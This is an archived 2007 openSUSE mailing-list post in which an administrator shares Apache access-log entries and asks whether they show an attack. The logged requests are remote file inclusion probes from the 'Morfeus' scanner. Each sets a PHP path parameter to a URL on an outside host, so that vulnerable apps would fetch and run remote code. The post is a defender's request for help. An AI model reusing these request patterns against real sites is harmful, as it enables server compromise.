[opensuse] Apache access log errors - attack? - openSUSE Users

25 Apr 2007

      Hello,

I found these errors in our web logs and it appears that either there is a
PHP attack on the apache site or perhaps a kit on the server?

Errors below (profanity not mine);

69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET
/components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li
sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:10 -0700] "GET
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http:
//203.198.68.236/~lisir/M.tx
t?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68
.236/~lisir/M.txt?/ HTTP/1.1
" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir
/M.txt?&/ HTTP/1.1" 404 1046
 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68.
236/~lisir/M.txt?&/ HTTP/1.1
" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68
.236/~lisir/M.txt?&/ HTTP/1.
1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/dokeos/claroline/auth/ldap/authldap.php?includePath=http://203.198.68.236/~
lisir/M.txt?&/ HTTP/1.1" 404
 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://2
03.198.68.236/~lisir/M.txt?&
/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 200 12222
"-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.23
6/~lisir/M.txt?&/ HTTP/1.1"
404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://203.198.68.236
/~lisir/M.txt?&/ HTTP/1.1" 4
04 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.
txt?&/ HTTP/1.1" 404 1046 "-
" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/admin/includes/send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.t
xt?&/ HTTP/1.1" 404 1046 "-"
 "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/
HTTP/1.1" 404 1046 "-" "Morfeus Fuck
ing Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET
/send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1"
404 1046 "-" "Morfeus Fucki
ng Scanner"
<snip>

It looks like they are getting a '404' error 'page not found', although
these requests are not a welcomed sight.

Thank you,

~James
-- 
To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org
For additional commands, e-mail: opensuse+help@opensuse.org

[opensuse] Apache access log errors - attack?

James D. Parra

Marcus Meissner

Randall R Schulz

Cristian Rodriguez R.

tags

participants (4)